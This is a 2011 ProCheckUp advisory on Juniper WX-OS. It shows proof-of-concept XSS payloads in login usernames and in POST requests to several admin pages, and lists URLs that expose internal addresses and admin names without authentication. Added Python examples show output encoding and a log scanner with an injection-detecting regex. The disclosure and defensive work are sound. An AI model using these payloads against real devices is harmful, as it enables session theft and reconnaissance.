
Juniper WX-OS WX series multiple persistent and authenticated XSS

Vulnerability found:
25 April 2011

Vendor informed:
28 April 2011

Severity level:
Medium/High (Persistent Script injection)

Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Description:
ProCheckUp has found that the following classes of vulnerabilities exist within WX-OS:
Unauthenticated information disclosure
Unauthenticated persistent Cross Site Scripting (XSS)
Authenticated multiple persistent and reflective Cross Site Scripting (XSS)

Successfully tested on:
Juniper Networks WX-OS
Version 5.6.8.0
Version 5.7.7.0

Model WXC500


Proof of concept:
1) Unauthenticated Persistent XSS
Persistent or stored XSS attacks are more serious than reflective XSS attacks, as the attacker does not have to trick victims into visiting a malicious page: the malicious code is stored by the application and becomes part of the webpage.

a) When a maliciously constructed username such as "><script>alert(1)</script> is submitted to the login screen, it is stored, and requesting https:// target-domain.foo/header.htm causes the attack to be carried out.

b) The access control log does not filter malicious characters.
When a maliciously constructed username, say "><script>alert(1)</script>, is submitted to the login screen, it is stored, and when the access log is viewed by a logged-in administrator the malicious JavaScript is executed:

https:// target-domain.foo/acl_display.htm
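What is missing on header.htm and acl_display.htm is output encoding of the stored username. The following is an added example, not Juniper's code: the row template is a hypothetical stand-in for the access-log table, and it shows the advisory's username payload breaking out of an attribute in a trusting template, then the same row rendered through html.escape so that the browser-side parser only ever sees table elements.

```python
import html
from html.parser import HTMLParser

# The username from the advisory's PoC, used here as constructed test input.
PAYLOAD = '"><script>alert(1)</script>'


class TagCollector(HTMLParser):
    """Records every start tag a browser-side parser would create from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Return the list of element names parsed from markup, in document order."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def render_acl_row_vulnerable(username, result):
    """Hypothetical access-log row that trusts the stored username: raw interpolation
    into both an attribute value and element text, as the advisory describes."""
    return f'<tr><td title="{username}">{username}</td><td>{result}</td></tr>'


def render_acl_row_hardened(username, result):
    """Same row with HTML entity encoding applied on output. quote=True also encodes
    the double and single quote, so the value cannot close the title attribute."""
    safe_user = html.escape(username, quote=True)
    safe_result = html.escape(result, quote=True)
    return f'<tr><td title="{safe_user}">{safe_user}</td><td>{safe_result}</td></tr>'


if __name__ == "__main__":
    for render in (render_acl_row_vulnerable, render_acl_row_hardened):
        print(render.__name__, "->", tags_in(render(PAYLOAD, "login failed")))
```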

Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user when an 'infected' page is viewed. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.

2) Authenticated Persistent XSS
Persistent or stored XSS attacks are more serious than reflective XSS attacks, as the attacker does not have to trick victims into visiting a malicious page: the malicious code is stored by the application and becomes part of the webpage.

A number of persistent or stored authenticated XSS attacks were found to exist, as numerous WX-OS programs fail to properly sanitize user-supplied parameters which are then stored. Add the Content-Type: application/x-www-form-urlencoded header when submitting POST data.

a) https:// target-domain.foo/radius_server_edit.htm

i) Submit POST data
POST /radius_server_edit.htm HTTP/1.1

id=&tName=<script>alert(1)</script>&tIpAddress= 127.0.0.1&tAuthPort=1812&tTimeout=3&tRetransmit=3&tDeadTime=0&tKey=blah

ii) Then view the radius settings page for the persistent attack to be carried out.
https:// target-domain.foo/radius.htm

b) https:// target-domain.foo/alarm_new.htm

i) Submit POST data
POST /alarm_new.htm HTTP/1.1

(POST data)
hEditEvent=false&hEventId=-1&sMetric=Compression+%28%25%29&sType=Absolute&sValue=Above&thresholdValue=+&thresholdSensitivity=+&sSensitivity=Above&sApplications=ca'><script>alert(1)</script>&sClasses=-1&sSR_endpoints=-1&sNonSR_endpoints=-1&sPeriod=Hourly&sSeverity=OK

ii) Then view the alarm_definitions page for the persistent attack to be carried out.
Reflective XSS
https://target-domain.foo/alarm_definitions.htm

Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user when an 'infected' page is viewed. The malicious code would run in the security context of the vulnerable website.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.

3) Reflective XSS
Numerous instances of reflective XSS were found to exist after authentication; this is less serious than stored XSS as the attacker has to trick the victim to visit the page for the attack to be carried out. Add the Content-Type: application/x-www-form-urlencoded header when submitting POST data.

a) https:// target-domain.foo/tun_application_detail.htm?cBizHourFlag=Y&dn="><script>alert(1)</script>&period="><script>alert(2)</script>

b) https:// target-domain.foo/cli.htm
POST /cli.htm HTTP/1.1

(POST data)
commands=help</textarea><script>alert(1)</script>&SubmitBtn=Submit&response=

c) https:// target-domain.foo/ping.htm
POST /ping.htm HTTP/1.1

(POST data)
IpAddress=127.0.0.1<script>alert(1)</script>&PacketSize=32&PingCount=3

d) https:// target-domain.foo/realtime.htm
POST /realtime.htm HTTP/1.1

(POST data)

hProtocol=TCP&readWriteAccess=&tSourceIP=*"%3balert(1)//&tDestinationIP=*&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCPhProtocol="%3balert(1)//&readWriteAccess=&tSourceIP=*&tDestinationIP=*&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCPhProtocol=TCP&readWriteAccess=&tSourceIP=*&tDestinationIP=%3balert(1)//&sAppName=All&cShowRegPortName=on&tSourcePort=*&tDestinationPort=*&imgAField=TCP

e) https:// target-domain.foo/ospf.htm
POST /ospf.htm HTTP/1.1

(POST data)
RmOspfAreaId=<BODY onLoad="alert(1)"> &RmOspfAuthMethod=V1&password=&RmOspfKeyId=&RmOspfKey=

f) https:// target-domain.foo/radius_server_edit.htm
POST /radius_server_edit.htm HTTP/1.1

(POST data)
id=&tName=><script>alert(1)</script>&tIpAddress=127.0.0.1&tAuthPort=1812&tTimeout=3&tRetransmit=3&tDeadTime=0&tKey=blah
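Since the vendor response was end-of-life rather than a patch, operators still running WX-OS are limited to detecting attempts. The following added example (not from the advisory or from Juniper) scans constructed Common Log Format access-log lines for the parameters the PoCs in this section show being reflected, flagging values that carry any of the three injection shapes seen above: a tag, an event-handler attribute, or a quote that closes a JavaScript string. The endpoint/parameter allow-list, the log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed allow-list of the parameters the PoCs in section 3 show being reflected
# (built here from the advisory, not from any Juniper documentation).
WATCHED = {
    "/tun_application_detail.htm": {"dn", "period"},
    "/cli.htm": {"commands"},
    "/ping.htm": {"IpAddress"},
    "/realtime.htm": {"tSourceIP", "tDestinationIP"},
    "/ospf.htm": {"RmOspfAreaId"},
    "/radius_server_edit.htm": {"tName"},
}

# One alternative per injection context seen in the PoCs: a tag (<script, <BODY, </textarea),
# an event-handler attribute (onLoad=), and a quote followed by ';' that ends a JS string.
SUSPICIOUS = re.compile(r'<\s*/?\s*[a-z]|\bon[a-z]+\s*=|["\']\s*;', re.IGNORECASE)

# Common Log Format; only the client IP and the request target are used.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')


def check_request(target, body=""):
    """Return the watched parameter names whose decoded value looks like markup or script.
    POST bodies are only available if request-body logging (or a WAF) captures them."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path, set())
    params = parse_qsl(parts.query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    return [name for name, value in params if name in watched and SUSPICIOUS.search(value)]


def scan_log(lines):
    """Return (client_ip, path, flagged_params) for each log line carrying an injection attempt."""
    alerts = []
    for line in lines:
        match = LOG_LINE.match(line)
        if match and (flagged := check_request(match["target"])):
            alerts.append((match["ip"], urlsplit(match["target"]).path, flagged))
    return alerts


# Constructed sample log lines (not from any real device); the first mirrors PoC 3a.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Apr/2011:10:01:02 +0100] "GET /tun_application_detail.htm?cBizHourFlag=Y&dn=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&period=Hourly HTTP/1.1" 200 5120',
    '203.0.113.7 - - [25/Apr/2011:10:01:09 +0100] "GET /cli.htm?commands=help HTTP/1.1" 200 2048',
    '198.51.100.4 - - [25/Apr/2011:10:02:00 +0100] "GET /tun_application_detail.htm?cBizHourFlag=Y&dn=branch-office&period=Daily HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The body parameters from PoCs 3c to 3f can be fed to check_request directly when request bodies are available, as the tests for this block do.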

Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.

4) Information disclosure
A large number of programs can be accessed without authentication, although the information disclosed was classified at most as medium severity (internal IPs, the administrator username and the machine name).

For instance, requesting the URL
https:// target-domain.foo/csv/arp.csv
discloses the IP addresses of the device's interfaces, and the IP and MAC addresses of the client machines which have accessed the device.

Other files within the /csv/ directory are also unprotected:
https:// target-domain.foo/csv/ip-flow.csv
https:// target-domain.foo/csv/localrt.csv (seems to display routes)

Requesting
https:// target-domain.foo/header.htm
discloses the machine name, the name of the administrator currently logged on, and the disk status.

Other files within the web interface which do not require authentication:
https:// target-domain.foo/executive.htm
https:// target-domain.foo/ssl_certificates.htm (certificates listed)
https:// target-domain.foo/ssl_certificates_import.htm
https:// target-domain.foo/ssl_certificates_view.htm (view certificates)
https:// target-domain.foo/tacacs_server_edit.htm
https:// target-domain.foo/quick_demo.htm
https:// target-domain.foo/cli.htm?commands=help
https:// target-domain.foo/app_accl_ssl.htm
https:// target-domain.foo/header_preservation.htm
https:// target-domain.foo/ipsec_applications.htm
https:// target-domain.foo/ipsec_wiz_custom_apps.htm
https:// target-domain.foo/legend_app_overview.htm
https:// target-domain.foo/prompt_performance.htm
https:// target-domain.foo/virtual_endpoints.htm

Consequences:
Any unnecessary information disclosure might lead to further attacks.


How to fix:
In October 2012 Juniper obsoleted WX-OS, replacing it with Riverbed appliances.

Legal:
Copyright 2011 - 2013 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to ProCheckUp, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not liable for any misuse of this information by any third party.